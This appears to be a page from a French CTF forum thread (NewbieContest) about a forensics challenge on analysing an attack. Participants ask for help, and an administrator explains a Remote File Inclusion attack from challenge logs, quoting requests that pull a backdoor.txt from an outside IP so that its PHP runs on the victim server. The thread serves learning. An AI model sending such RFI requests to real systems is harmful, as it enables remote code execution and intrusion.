logo Homepage
+  NewbieContest
|-+  Challenges» Aide Forensics» Forensics - Analyse d'attaque
Username:
Password:
Pages: 1 ... 6 7 [8] 9
  Retourner à l'épreuve    Imprimer  
Auteur Fil de discussion: Forensics - Analyse d'attaque  (Lu 91602 fois)
kevin56140

Profil challenge

Classement : 1342/54252

Néophyte
*
Hors ligne Hors ligne
Messages: 34


Voir le profil
« #105 le: 26 Mars 2015 à 22:54:09 »

Effectivement @The Lsd j'ai lu et j'ai compris enfin je pense.

Je pense être sur une piste concernant le mot de passe John, je pense qu'il s'est fait "cramé" ai-je bon ou ai-je tort ?
Journalisée
kevin56140

Profil challenge

Classement : 1342/54252

Néophyte
*
Hors ligne Hors ligne
Messages: 34


Voir le profil
« #106 le: 29 Mars 2015 à 16:00:24 »

Un petit Up
Journalisée
kevin56140

Profil challenge

Classement : 1342/54252

Néophyte
*
Hors ligne Hors ligne
Messages: 34


Voir le profil
« #107 le: 08 Avril 2015 à 17:05:50 »

Bonjour à tous,

Je me permets de revenir posté ici, car je suis toujours bloqué pour obtenir le mdp de john.

J'ai donc plusieurs questions :
/* moderated par the lsd : chuuut, un peu moins fort ! iirc, tu pars pas trop mal, mais faut pas le dire aux autres !*/
ça fait deux semaines que je suis dessus :'(.


Journalisée
kevin56140

Profil challenge

Classement : 1342/54252

Néophyte
*
Hors ligne Hors ligne
Messages: 34


Voir le profil
« #108 le: 09 Avril 2015 à 08:44:38 »

C'est RE-moi

@TheLSD est-il possible d'avoir par mp le message que j'ai posté hier sans la modération car je ne me souviens plus qu'est ce que j'ai posté.

Désolé pour le dérangement.
Journalisée
Asteriksme
Modérateur Global

Profil challenge

Classement : 37/54252

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 785

.


Voir le profil WWW
« #109 le: 09 Avril 2015 à 10:49:12 »

si tu te souviens plus de ce que t'as fait à la limite le mieux est de recommencer 
Journalisée

"It's a funny thing about some mathematicians. We often don't care if the results have applications because the results are themselves so pretty."
kevin56140

Profil challenge

Classement : 1342/54252

Néophyte
*
Hors ligne Hors ligne
Messages: 34


Voir le profil
« #110 le: 09 Avril 2015 à 11:57:51 »

Je sais ce que j'ai fait mais je me souviens plus de ce que j'ai posté ce n'est pas la même chose.
Journalisée
Elliot
Profil challenge

Classement : 26031/54252

Néophyte
*
Hors ligne Hors ligne
Messages: 4


Voir le profil
« #111 le: 12 Août 2015 à 12:43:11 »

Bonjour,

Pourquoi la backdoor est un fichier txt ? J'imagine que ce n'est pas une information importante pour la résolution de l'épreuve mais juste pas curiosité j'aurais bien aimé savoir !

Bonne journée.
Journalisée
sandelan

Profil challenge

Classement : 40/54252

Membre Junior
**
Hors ligne Hors ligne
Messages: 91

"Newbie Accro"


Voir le profil
« #112 le: 12 Août 2015 à 14:42:15 »

Salut

Pourquoi la backdoor est un fichier txt ?

Si tu fais référence aux fichiers avec une extention py alors il s'agit tout simplement de scripts écrits en langage python.

Ce langage est très utilisé surtout, sous linux et je ne peux que te conseiller de l'étudier.
Journalisée
Elliot
Profil challenge

Classement : 26031/54252

Néophyte
*
Hors ligne Hors ligne
Messages: 4


Voir le profil
« #113 le: 12 Août 2015 à 16:06:46 »

Non je ne parlais pas de ça mais de la backdoor.txt que l'on peut voir dans les logs !
Journalisée
sandelan

Profil challenge

Classement : 40/54252

Membre Junior
**
Hors ligne Hors ligne
Messages: 91

"Newbie Accro"


Voir le profil
« #114 le: 12 Août 2015 à 16:15:01 »

Dans les logs ok !
Alors je persiste, c'est peut être une backdoor écrite en python.
pour la lancer : python backdoor.txt
Quelqu'un a une autre idée ?
Journalisée
pixis
Administrateur

Profil challenge

Classement : 16/54252

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 664


Voir le profil WWW
« #115 le: 13 Août 2015 à 07:58:59 »

Salut,
la backdoor est incluse via une RFI (Remote File Inclusion). On le voit sur deux lignes de log :

[...] GET index.php?page=http://199.230.171.106/backdoor.txt [...]
[...] GET index.php?page=http://199.230.171.106/backdoor.txt&file=pass.php [...]


Le but, c'est que le contenu php de la backdoor soit executé sur le serveur de l'attaqué, et non pas sur le serveur de l'attaquant. Si l'extension était .php, alors le code serait exécuté par le serveur 199.230.171.106 et le résultat serait inclus là où la variable $_GET['page'] est incluse.
Ici, le comportement souhaité, c'est que le code php lui même soit inclus en dur dans la page index.php du serveur attaqué. Donc on veut que la réponse à l'appel http://199.230.171.106/backdoor.? renvoie le code php lui même. Quoi de mieux que de l'appeler backdoor.txt ?
Ensuite, comme c'est index.php et qu'il y a le code php brut de backdoor.txt, alors ça sera exécuté à ce moment là, par le serveur attaqué.

C'est pour cela que l'extension .txt est choisie.
« Dernière édition: 13 Août 2015 à 15:11:45 par pixis » Journalisée

Newbie Contest Staff :
Pixis
Statut :
Administrateur
Blog :
hackndo
Elliot
Profil challenge

Classement : 26031/54252

Néophyte
*
Hors ligne Hors ligne
Messages: 4


Voir le profil
« #116 le: 13 Août 2015 à 08:20:45 »

D'accord je comprends mieux ! Je n'avais pas pensé que le script pouvait s’exécuter chez l'attaquant au lieu de la victime.
J'aime bien cette épreuve elle semble beaucoup plus réaliste que les premières 
Journalisée
Pech
Profil challenge

Classement : 34/54252

Membre Junior
**
Hors ligne Hors ligne
Messages: 83


Voir le profil
« #117 le: 13 Août 2015 à 15:05:01 »

Heuu... sans vouloir me méler de ce qui me regarde pas, on est pas dans les afterwards là, non ?
Journalisée
pixis
Administrateur

Profil challenge

Classement : 16/54252

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 664


Voir le profil WWW
« #118 le: 13 Août 2015 à 15:06:54 »

Non, mais ça ne donne pas d'indices/informations qui aident à la résolution de l'épreuve, donc pas de soucis

PS : Ces deux lignes de log ont déjà été citées dans ce forum
« Dernière édition: 13 Août 2015 à 15:10:32 par pixis » Journalisée

Newbie Contest Staff :
Pixis
Statut :
Administrateur
Blog :
hackndo
Pech
Profil challenge

Classement : 34/54252

Membre Junior
**
Hors ligne Hors ligne
Messages: 83


Voir le profil
« #119 le: 13 Août 2015 à 15:13:57 »

Non, mais ça ne donne pas d'indices/informations qui aident à la résolution de l'épreuve, donc pas de soucis

PS : Ces deux lignes de log ont déjà été citées dans ce forum

OK pour moi
J'avoue ne pas avoir lu tous les messages ici, uniquement les tous derniers.
Journalisée
Pages: 1 ... 6 7 [8] 9
  Retourner à l'épreuve    Imprimer  
 
Aller à: